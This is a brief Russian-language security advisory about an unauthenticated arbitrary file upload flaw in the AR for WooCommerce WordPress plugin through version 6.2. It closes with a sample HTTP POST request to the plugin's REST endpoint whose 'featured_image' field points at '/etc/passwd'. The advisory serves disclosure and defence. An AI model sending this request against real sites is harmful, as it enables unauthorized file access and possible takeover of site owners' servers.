
AR For Woocommerce <= 6.2 - Неаутентифицированная произвольная загрузка файлов
AR For Woocommerce <= 6.2 — неаутентифицированная произвольная загрузка файлов
Плагин AR for WooCommerce для WordPress уязвим к произвольной загрузке файлов из-за отсутствия проверки типа файлов во всех версиях до 6.2 включительно. Это позволяет неаутентифицированным злоумышленникам загружать произвольные файлы на сервер сайта, что может привести к удалённому выполнению кода.
POST /wp-json/ar-wc-display/featuredimage/ HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/json
Content-Length: 41
{"id":123,"featured_image":"/etc/passwd"}